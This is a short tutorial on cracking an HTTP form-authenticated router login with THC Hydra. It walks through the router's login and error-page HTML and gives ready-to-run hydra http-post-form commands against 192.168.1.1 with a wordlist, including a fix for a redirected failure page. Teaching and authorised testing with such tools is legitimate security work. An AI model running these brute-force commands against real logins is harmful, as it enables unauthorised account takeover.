THC Hydra - Dictionary Attack
Hydra is an open-sourced dictionary password cracking, or also known as dictionary attack, released from THC.
Dictionary Attack Defination from http://lastbit.com/
Dictionary Attack uses a dictionary. Password Crackers will try every word from the dictionary as a password. A good dictionary (also known as a word list) is more than just a dictionary, e.g. you will not find the word "qwerty" in the ordinary dictionary but it will surely be included into a good word list. Indeed, this combination of characters is commonly used as a password.
I will be giving an example of how you would use hydra to crack a password protected web page using form authentication, which might look like this.
I will only speak of the method to crack http form authentication as it's much more complicated. For more information regarding cracking of other protocols, check hydra help page by running hydra without any parameters.
We need to take a look at the source code of the web page. look at the HTML form that is used by the user to login to the service. It looks like the following for my corega router login page:
<FORM name=theform id=theform action="/auth/logining.php" method=post>
<TABLE height="75%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD vAlign=center align=middle height=400>
<DIV align=center><BR><BR>
<!--TABLE cellSpacing=1 cellPadding=5 border=1 bordercolor=#ff9933 bgcolor=#ffffb3-->
<TABLE cellSpacing=1 cellPadding=5 border=1 bordercolor=#ff9933 bgcolor=#ffffcc>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=5 width=250 border=0>
<TBODY>
<TR>
<TD class=tdTextc noWrap><B>Username :</B></TD>
<TD class=txt1><INPUT maxLength=12 size=18 name=user></TD></TR>
<TR>
<TD class=tdTextc noWrap><B>Password :</B></TD>
<TD class=txt1><INPUT type=password maxLength=12 size=18 name=password></TD>
</TR>
</TBODY>
</TABLE>
</TD>
</TR>
<TR>
<TD align=center>
<INPUT type=submit value="Submit" onclick="return login()">
<INPUT type=reset value="Reset" name=Close>
</TD>
</TR>
There are more than one type of authentication method through HTTP, and this dlink router webpage is using http form authentication using post method from the line <FORM name=theform id=theform action="/auth/logining.php" method=post>, this tells us that the webpage is using form authentication and using post method, to the webpage "/auth/logining.php"
We need to identify the page for authentication which can be extracted from the "action" of the form. We also need to find out the variables and their names sent to the authentication page, which in this case is: <INPUT maxLength=12 size=18 name=user> and <INPUT type=password maxLength=12 size=18 name=password>
We also need to get a unique phrase from failed login attempt to allow Hydra differentiate between successful and failure attempts, which looks like this.
Take a look at the source which looks like this
<html>
<head>
<title>Login error</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="Page.css">
<script language="JavaScript">
if (parent.location.href != window.location.href)
parent.location.href = window.location.href;
</script></head>
<BODY bgcolor="#FFFFFF" leftmargin="0" topmargin="0">
<form name="tF" id=tF>
<table width="100%" border="0" cellspacing="0" cellpadding="0" height="75%">
<tr>
<td valign="middle" align="center" height="400">
<div align="center"><br><br>
<table border="1" cellspacing="1" cellpadding="5">
<tr>
<td>
<table border="0" cellspacing="0" cellpadding="5" width=250 bgcolor="#FFFFFF">
<tr>
<td nowrap class=tdTextc colspan=2><font color=#FF0000><b>Login Error.</b></td>
</tr>
<tr>
<td nowrap class=tdTextc colspan=2><font color=#FF0000><b>Invalid username or password.</b></td>
</tr>
</table>
</td>
</tr>
<p>
<tr>
<td align=center>
<INPUT onClick="javascript:self.location.href='login.php'" type="button" value="Back">
</td>
</tr>
<p>
</table>
</div>
</td>
</tr>
</talbe>
</form>
</body>
</html>
We could use <title>Login error</title> for the unique phrase for identification.
The command to use hydra for this case:
hydra -V -l [username] -P [password_list] [host] http-post-form "[target_page]:[username_variable_name]=^USER^&[password_variable_name]=^PASS^:[unique_phrase]"
where:
[username] = username to be used(could use -L instead to specify a textfile with username delimited by newline)
[password_list] = password list file to be used
[host] = ip/hostname of the host machine (e.g. 192.168.1.1)
[target_page] = the page that used for authentication checking
[username_variable_name] = the variable name for username
After filling in all those parameters, it would look like: hydra -V -l admin -P dictionary.txt 192.168.1.1 http-post-form "/auth/logining.php:user=^USER^&password=^PASS^:<title>Login error</title>"
But it would not work for this corega router page as the login fail page that we see is actually redirected, which is not picked up by hydra, therefore using the unique phrase of url=/auth/loginpserr.php would allow hydra to identify the attempt had failed. Technique of finding the page before redirection will not be mentioned in detail here, methods like network sniffing or even using a browser that do not support header redirection could work.
The actual command would be:
hydra -V -l admin -P dictionary.txt 192.168.1.1 http-post-form "/auth/logining.php:user=^USER^&password=^PASS^:url=/auth/loginpserr.php"
More information on other password cracker could be found at http://sectools.org/crackers.html